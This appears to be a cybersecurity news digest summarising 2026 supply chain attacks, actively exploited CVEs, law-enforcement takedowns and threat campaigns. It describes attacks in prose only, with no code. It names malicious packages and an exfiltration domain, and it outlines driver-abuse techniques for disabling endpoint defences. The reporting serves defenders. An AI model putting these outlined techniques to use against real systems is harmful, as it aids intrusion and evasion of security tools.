npm introduced staged publishing requiring maintainers to approve package releases via two-factor authentication (2FA) before they become publicly available, providing proof of presence for every publish including CI/CD and OIDC workflows. Additionally, npm added three new install source flags (--allow-file, --allow-remote, --allow-directory) to explicitly control non-registry install sources, replacing the single -allow-git flag. These measures target ongoing supply chain attack campaigns, such as those attributed to TeamPCP, which have escalated in open-source ecosystems.

Malicious PHP packages on Packagist, disguised as Laravel utilities, deploy a cross-platform remote access trojan (RAT) affecting Windows, macOS, and Linux systems. Eight additional packages were distributed in a coordinated supply chain attack targeting projects with JavaScript build tooling, inserting malicious postinstall scripts in package.json to download and execute a Linux binary from GitHub. The packages 'nhattuanbl/lara-helper', 'nhattuanbl/simple-queue', and 'nhattuanbl/lara-swagger' contain obfuscated PHP code that connects to a C2 server, enabling full remote access to compromised hosts. The RAT supports commands like system reconnaissance, shell execution, and file operations, and runs in the same process as the web application, granting full remote shell access.

Italian authorities have dismantled the CINEMAGOAL piracy operation that used a rogue app to harvest and redistribute authentication codes for major streaming platforms such as Netflix, Disney+, and Spotify. The operation involved over 100 searches, seizures in Italy, France, and Germany, and the identification of 70+ resellers. The system evaded platform blocks by proxying through legitimate services using virtual machines and false identities, causing an estimated €300M in damages. Authorities have begun issuing penalties to identified subscribers and continue analyzing seized data to trace financial flows and additional actors.

Anthropic’s Project Glasswing, powered by the Claude Mythos Preview model, has now identified over 10,000 high- or critical-severity vulnerabilities across widely used software since its launch a month prior, including 6,202 high/critical flaws affecting more than 1,000 open-source projects. Anthropic reports that 1,726 of these candidates have been confirmed as true positives, with 1,094 assessed as high or critical severity. Critical fixes include a WolfSSL certificate forgery flaw (CVE-2026-5194, CVSS 9.1), and 97 vulnerabilities have already been patched upstream with 88 advisories issued. While Mythos Preview demonstrates unprecedented offensive security capabilities—such as autonomously crafting attack chains and detecting real-time fraud like a $1.5 million wire transfer attempt—99% of its discovered vulnerabilities remain unpatched as of May 2026. The model’s rapid vulnerability discovery is reshaping patch cycles, with vendors like Microsoft anticipating sustained increases in monthly patches, and Anthropic urging organizations to accelerate hardening, MFA enforcement, and log retention to mitigate escalating dual-use risks.

Threat actors are actively exploiting a vulnerability in shared content delivery network (CDN) infrastructure, dubbed Underminr, to conceal malicious connections behind trusted domains. The technique abuses CDN tenant routing misconfigurations by presenting the Server Name Indication (SNI) and HTTP Host header of a reputable domain while forcing a connection to the IP address of another tenant on the same shared edge infrastructure. This mismatch allows traffic to bypass network policies and appear legitimate, enabling evasion of protective DNS services and egress filtering. Underminr has been observed in attacks targeting large-scale hosting providers, including those that previously mitigated domain fronting, and is being used to hide command-and-control (C2) communications, VPN connections, and proxy traffic. The vulnerability impacts approximately 88 million domains globally, with the highest concentrations in the US, UK, and Canada.

A coordinated supply chain compromise has affected multiple Laravel-Lang PHP packages—including laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and laravel-lang/actions—resulting in the delivery of a multi-platform credential-stealing framework. The attack involved over 700 compromised package versions published within seconds of each other on May 22–23, 2026, suggesting automated mass tagging after likely compromise of organization-level credentials or release infrastructure. A malicious backdoor embedded in src/helpers.php executes automatically via Composer’s autoload.files mechanism on every PHP request in infected applications. The dropper retrieves a PHP-based cross-platform payload from flipboxstudio.info, which deploys platform-specific stealers: a Visual Basic Script on Windows (executed via cscript), and shell execution on Linux/macOS. The malware performs extensive credential harvesting across cloud providers, CI/CD systems, version control, cryptocurrency wallets, browsers, password managers, VPNs, and application tokens (e.g., Discord, Slack, Outlook, FileZilla), before exfiltrating encrypted data to flipboxstudio.info and self-deleting.

A maximum-severity (CVSS 10.0) privilege escalation vulnerability in the LiteSpeed User-End cPanel Plugin (CVE-2026-48172) is actively exploited to execute arbitrary scripts as the root user. The flaw arises from incorrect privilege assignment in the lsws.redisAble function, enabling any authenticated cPanel user—including attackers or compromised accounts—to gain root-level code execution. The issue affects plugin versions 2.3 through 2.4.4; WHM plugin versions are not impacted. Patches are available in cPanel plugin v2.4.7 (bundled with WHM v5.3.1.0).

A critical SQL injection vulnerability in Drupal Core (CVE-2026-9082, CVSS 6.5) has been confirmed as actively exploited in the wild, prompting CISA to add it to the Known Exploited Vulnerabilities (KEV) catalog. The flaw affects all supported Drupal Core versions, enabling privilege escalation and potential remote code execution via specially crafted requests leveraging the database abstraction API. Attackers are probing and targeting vulnerable PostgreSQL-backed Drupal sites, with observed activity concentrated in gaming and financial services sectors across 65 countries. Federal agencies have been directed to apply patches by May 27, 2026.

A coordinated international law enforcement operation dismantled First VPN Service, a criminal-focused VPN infrastructure leveraged by at least 25 ransomware groups, threat actors, and cybercriminals for anonymizing malicious activities including ransomware attacks, data theft, network reconnaissance, and denial-of-service operations. The takedown spanned May 19–20, 2026 and involved authorities from 21 countries, including France, the Netherlands, Ukraine, the U.S., and the U.K., under operations led by Europol and Eurojust. The service, active since 2014, provided 32 exit nodes across 27 countries and promoted itself on Russian-speaking cybercrime forums such as Exploit[.]in and XSS[.]is as an anonymity tool resistant to law enforcement cooperation. Impact includes the seizure of 33 servers, interviews with the service administrator, and disruption of infrastructure supporting global cybercrime operations. The FBI confirmed the service’s role in enabling multiple ransomware operations, including Avaddon Ransomware.

A CISA contractor exposed credentials for AWS GovCloud accounts and internal systems via a public GitHub repository named "Private-CISA", enabling potential lateral movement within CISA’s networks. The exposure, first reported by GitGuardian on May 15, 2026, included plaintext passwords, cloud keys, tokens, and software deployment details. The repository was taken offline promptly, but exposed AWS keys remained valid for 48 hours, and CISA has stated there is no indication of sensitive data compromise. Lawmakers have since demanded answers from CISA, citing concerns over internal security culture and contractor oversight, particularly amid significant workforce disruptions at the agency. Reports indicate CISA struggled to fully invalidate exposed credentials for over a week, with evidence suggesting adversaries may have accessed the secrets. An RSA private key in the repository granted full access to CISA’s GitHub enterprise account until its recent revocation.

UAC-0050 continues to target European financial institutions with spear-phishing and RMS malware to establish persistent access. Concurrently, Russia-aligned operations such as Ghostwriter (UAC-0057/UNC1151) have intensified phishing campaigns against Ukrainian government entities since spring 2026, using Prometheus-themed lures and sophisticated multi-stage payloads like OYSTERFRESH, OYSTERBLUES, and Cobalt Strike. Ukraine’s National Security and Defense Council also reported increased Russian use of AI tools (e.g., ChatGPT, Google Gemini) for target reconnaissance and malware runtime command generation, alongside broader Kremlin-backed campaigns focused on intelligence gathering, long-term network persistence, and influence operations. These activities align with prior reporting on Russia-nexus adversaries targeting Ukrainian entities and NATO member states, including the deployment of legitimate remote access tools like RMS by UAC-0050.

In May 2026, Zscaler completed its acquisition of SquareX, formally integrating the Browser Detection and Response (BDR) solution into the Zero Trust Exchange platform to secure unmanaged devices via user-preferred browsers. SquareX’s extension, which converts standard browsers into enterprise-grade secure workspaces with real-time threat detection, remains a standalone offering while being incorporated into Zscaler’s broader strategy. The move, alongside concurrent industry consolidation, reflects growing enterprise adoption of secure browsers amid rising threats to browser-based activities, including malicious extensions, phishing, and AI tool interactions. Gartner projects adoption of secure enterprise browsers to rise from 10% to 25% of organizations by 2028, underscoring the sector’s rapid evolution.

Two former executives of a call-tracking and analytics company pleaded guilty to concealing a years-long tech support fraud scheme that targeted individuals globally. Former CEO Adam Young and former CSO Harrison Gevirtz admitted to misprision of a felony and are scheduled for sentencing on June 16. They operated C.A. Cloud Attribution, Ltd. between early 2017 and April 2022, providing services including telephone numbers, call recordings, and call forwarding to known fraudsters. The fraud schemes involved deceptive pop-up ads falsely claiming system infections, directing victims to call centers charging hundreds of dollars for fictitious technical services. Some scammers remotely accessed victims' computers and stole personal and financial information to withdraw funds without authorization. Young and Gevirtz allegedly advised customers to use rotating telephone numbers to reduce complaints and prevent account terminations, and introduced fraudsters to one another.

Trend Micro patched CVE-2026-34926, a medium-severity directory traversal flaw in Apex One on-premises installations, after confirming in-the-wild exploitation targeting Windows systems. The vulnerability allowed local attackers with admin credentials to inject malicious code into server key tables and deploy payloads to agents. CISA added the CVE to its Known Exploited Vulnerabilities (KEV) catalog on May 22, 2026, requiring federal agencies to remediate by June 4, 2026. Concurrently, Trend Micro released updates addressing seven local privilege escalation vulnerabilities in the Apex One Standard Endpoint Protection agent. Threat actors have repeatedly exploited Apex One flaws in zero-day attacks, including prior incidents tracked as CVE-2025-54948 (August 2025), CVE-2022-40139 (September 2022), and CVE-2023-41179 (September 2023).

Healthcare organizations experienced a notable increase in sophisticated social engineering attacks in 2025, driven by AI-enhanced pretexting and phishing tactics that exploit operational urgency and trust in clinical workflows. Threat actors leveraged generative AI to craft highly targeted, context-aware communications and malicious documents, impersonating executives, vendors, and HR to manipulate healthcare professionals into divulging credentials or enabling session hijacking. The attacks align with long-standing industry vulnerabilities, including legacy systems, high-value data (e.g., patient records), and fragmented supplier ecosystems. The Verizon 2026 Data Breach Investigations Report (DBIR) identifies social engineering as a top three breach pattern in healthcare, alongside system intrusion and miscellaneous errors, collectively accounting for 81% of incidents. Pretexting—previously absent from DBIR healthcare data—now ranks as the second most common social action in healthcare breaches, reflecting a shift toward credibility-driven deception over traditional urgency-based lures.

On May 22, 2026, Drupal confirmed active exploitation of CVE-2026-9082, a critical SQL injection vulnerability in Drupal Core’s database abstraction API that enables unauthenticated attackers to execute arbitrary SQL commands on PostgreSQL-backed sites. The flaw can lead to remote code execution, privilege escalation, or information disclosure without authentication. Patches have been issued for active Drupal branches (10.4–11.3) and manual fixes provided for end-of-life versions (8.9, 9.5). Drupal rated the risk internally as highly critical (23/25), though NIST assigned a CVSS v3 score of 6.5 (medium severity). Administrators are urged to update immediately, including those using non-PostgreSQL configurations due to upstream dependency fixes.

Organizations are broadening fraud measurement beyond traditional chargeback rates to include operational, reputational, and growth-related impacts as fraud techniques evolve. Emerging patterns such as account takeovers and synthetic identity fraud are driving indirect losses, customer churn, and operational overhead that are not captured by chargeback metrics. This shift reflects growing recognition that fraud prevention strategies must balance risk reduction with customer experience and revenue protection.

Jacob Butler, a 23-year-old Canadian residing in Ottawa, has been arrested for operating the Kimwolf DDoS botnet, a variant of the AisURU botnet. Butler, known online as 'Dort,' faces a charge of aiding and abetting computer intrusion in the US, with potential penalties of up to 10 years in prison if convicted. The botnet enslaved approximately 2 million devices, primarily Android-based and traditionally 'firewalled' consumer hardware like digital photo frames and web cameras, and operated as an Android-focused successor to the Aisuru botnet. Kimwolf propagated via residential proxy networks to expand its reach and was used in cybercrime-as-a-service operations, selling access for DDoS attacks—including against Department of Defense IP addresses—peaking at 31.4 Tbps. The Kimwolf botnet emerged from a vulnerability disclosed in January 2026 and became the world’s largest and most disruptive botnet. Butler has been linked to cybercrime activities dating back to at least 2017, including DDoS attacks, doxing, email flooding, and ties to the LAPSUS$ group. Investigations revealed his involvement in Minecraft cheating software, CAPTCHA bypass tools, and temporary email services. On March 11, 2026, authorities disrupted Kimwolf and Aisuru as part of a coordinated operation in Canada and Germany, though no arrests were disclosed at the time. The US Justice Department later announced Butler’s arrest in Ottawa and unsealed seizure warrants for 45 DDoS-for-hire platforms, including one collaborating with Kimwolf.

A threat actor launched an SEO poisoning campaign in early 2026, creating fake websites impersonating Google’s Gemini CLI and Anthropic’s Claude Code to distribute an in-memory infostealer targeting Windows developers and enterprise users. Victims searching for legitimate AI coding tools were redirected via SEO manipulation to malicious domains that mimic official installation pages. Upon following provided PowerShell commands, users unknowingly executed an infostealer capable of harvesting browser credentials, session cookies, collaboration platform data, cryptocurrency wallet details, cloud storage files, and system metadata. The stolen data was exfiltrated to attacker-controlled command-and-control (C2) servers. The campaign demonstrates a deliberate focus on developer workstations and enterprise environments, using domain naming patterns (.co.uk, .us.com, .us.org) to suggest geographic targeting of the US and UK.

Apple’s fraud prevention efforts have now cumulatively blocked over $11.2 billion in App Store fraud over six years, including more than $2.2 billion in 2025 alone. The company terminated 193,000 developer accounts, rejected 138,000 enrollments, and deactivated 40.4 million customer accounts due to fraud or abuse in 2025. It also blocked 5.4 million stolen credit cards and banned nearly 2 million user accounts from further transactions. Enforcement expanded through AI-driven detection models, the blocking of 1.1 billion fraudulent account creations, and takedowns of 28,000 illegitimate apps on pirate storefronts.

CISA added two vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2025-34291 in Langflow and CVE-2026-34926 in Trend Micro Apex One, citing active exploitation. CVE-2025-34291, with a CVSS score of 9.4, is an origin validation error enabling arbitrary code execution and full system compromise, exposing sensitive tokens and triggering cascading compromises across integrated services. CVE-2026-34926, rated 6.7, is a directory traversal flaw in on-premise Apex One versions allowing pre-authenticated local attackers with administrative server access to inject malicious code deployable to agents. MuddyWater, an Iranian threat actor, has exploited CVE-2025-34291 for initial access, while Trend Micro observed exploitation attempts for CVE-2026-34926 in the wild. FCEB agencies must remediate by June 4, 2026.

A critical, unauthenticated REST API vulnerability (CVE-2026-20223, CVSS 10.0) in Cisco Secure Workload enables remote attackers to read sensitive data and modify configurations across tenant boundaries with Site Admin privileges. The flaw affects both SaaS and on-prem deployments across multiple software releases, with no available workarounds. Exploitation requires crafting a malicious API request to a vulnerable endpoint, posing significant risk to network isolation and data confidentiality.

New guidance emphasizes extending AI Bills of Materials (AI BOMs) to include runtime behavior and delegated authority for autonomous AI agents, addressing critical gaps in traditional artifact-lineage documentation. The shift reflects the rise of agentic AI systems that perform actions beyond static model/data composition, introducing dynamic supply chain risks tied to execution context, tool permissions, and decision propagation. Organizations are urged to adopt agentic-ready AI BOM frameworks to prevent incidents like unchecked AI agents deleting production databases due to authorization failures.

Research from Aikido Security reveals that Google Cloud Platform (GCP) API keys remain active for a median of 16 minutes and up to 23 minutes after deletion, creating a critical window for attackers to exploit deleted credentials. The revocation delay varies significantly by region, with authentication success rates ranging from 5% to 79% within the first minute post-deletion. Attackers holding deleted API keys can continue making authenticated requests until Google’s infrastructure propagates the revocation, potentially exfiltrating data via enabled services like Gemini. The GCP console falsely indicates immediate revocation, leaving organizations unaware of ongoing exposure.

A persistent Service Worker flaw in Chromium-based browsers allowed JavaScript execution to continue running in the background after browser closure, enabling remote code execution (RCE) on devices. The vulnerability was reported in December 2022 and remained unpatched despite being marked as fixed in February 2026. Google inadvertently exposed technical details in the Chromium Issue Tracker for 14 weeks, increasing the risk of exploitation. Affected browsers include Chrome, Edge, Brave, Opera, Vivaldi, and Arc.

A 2025–2026 Omdia study indicates identity teams are establishing dedicated budgets for securing AI agents, reflecting a significant shift from traditional IAM funding models controlled by CIO or CISO offices. As AI agents proliferate and operate autonomously across hybrid environments, securing their identities—authentication, authorization, governance, and life cycle management—has become a first-class requirement. Enterprises are allocating standalone AI budgets to fund these identity security layers, creating a new funding stream distinct from IT or security budgets.

An international law enforcement operation dismantled the 'First VPN' service, widely abused in ransomware and data theft campaigns, after a multi-year investigation. Operations included the seizure of 33 servers across 27 countries, the arrest of a Ukrainian administrator, and the takeover of associated domains (1vpns.com, 1vpns.net, 1vpns.org, and onion variants). The platform was marketed as no-logging and privacy-focused but allegedly used by threat actors to conceal infrastructure and identities. Investigators infiltrated the service, collected traffic data, and identified thousands of users globally, sharing 506 user identities and 83 intelligence packages with international partners to support ongoing cybercrime investigations. Europol coordinated the operation with support from Bitdefender, advancing 21 investigations through the intelligence gathered.

The TAOTH espionage campaign continues to target Eastern Asia via hijacked Sogou Zhuyin update servers, distributing malware families such as C6DOOR, GTELAM, DESFY, and TOSHIS to dissidents, journalists, and business leaders. The campaign, linked to infrastructure overlap with the ITOCHU threat actor, primarily impacts Taiwan (49% of targets), Cambodia, and the U.S. Additional distribution methods include phishing websites and fake cloud storage pages. Concurrently, Chinese state-aligned hackers have expanded the use of the Linux post-exploitation framework Showboat, now confirmed to operate as a SOCKS5 proxy backdoor with rootkit-like capabilities. Showboat has been deployed against telecommunications providers in the Middle East since at least mid-2022, with victims identified in Afghanistan, Azerbaijan, and possible compromises in the U.S. and Ukraine. Its modular design enables remote shell access, file transfers, and LAN device infection, often leveraging infrastructure geolocated to Chengdu, Sichuan. The malware retrieves obfuscation code from a Pastebin snippet created in January 2022, highlighting long-term development and reuse across Chinese APT groups including Calypso, which also deploys the JFMBackdoor Windows backdoor.

Security vendors have identified 54 distinct EDR killer tools that abuse Bring Your Own Vulnerable Driver (BYOVD) techniques by exploiting 34 vulnerable, signed drivers to disable endpoint detection and response (EDR) solutions. The tools are deployed primarily by ransomware groups, affiliates, and underground service providers to neutralize security controls before executing file-encrypting malware. Attackers gain kernel-mode privileges (Ring 0) to terminate EDR processes, disable protection mechanisms, and tamper with kernel callbacks, thereby undermining endpoint defenses through abuse of Microsoft’s driver trust model. Recent research demonstrates userland-only techniques that expand the viability of BYOVD attacks. By creating software-emulated device nodes with arbitrary hardware IDs via SetupAPI or Software Device API, attackers can trigger AddDevice callbacks and assemble device stacks without physical hardware. Registry manipulation further enables binding unsigned drivers to arbitrary hardware, bypassing INF/catalog requirements while preserving driver signature validation. Additionally, filter drivers can be made accessible by placing them atop a functional device stack (e.g., Disk Drive class) to satisfy IRP_MJ_CREATE, highlighting new avenues for expanding the attack surface against conditional vulnerabilities in signed drivers. These developments suggest that the pool of exploitable vulnerable drivers may grow as attackers refine userland-only deployment methods, even as Microsoft tightens cross-signing policies.

A critical severity vulnerability, CVE-2026-22557, in Ubiquiti’s UniFi Network Application (versions 10.1.85 and earlier) allows remote attackers on the local network to execute path traversal attacks and gain unauthorized access to system files, enabling account takeover without privileges or user interaction. This vulnerability impacts UniFi Network Application deployments, including those managed via UniFi Cloud Gateway, switches, access points, and gateways. Ubiquiti patched the issue in versions 10.1.89 and later, alongside addressing a second authenticated NoSQL injection flaw enabling privilege escalation. Ubiquiti has since patched three additional maximum-severity vulnerabilities in UniFi OS (CVE-2026-34908, CVE-2026-34909, CVE-2026-34910), enabling unauthorized system changes, file access, and command injection after network access is obtained. Two supplementary flaws (CVE-2026-33000 and CVE-2026-34911) were also addressed. Threat intelligence firm Censys estimates nearly 100,000 Internet-exposed UniFi OS endpoints globally, with approximately 50,000 located in the United States. Ubiquiti has not disclosed evidence of in-the-wild exploitation for any of these vulnerabilities, which were reported via its HackerOne bug bounty program and are exploitable in low-complexity attacks. Historical targeting of Ubiquiti products by state-backed actors and cybercriminals has involved botnet construction and traffic concealment in past campaigns.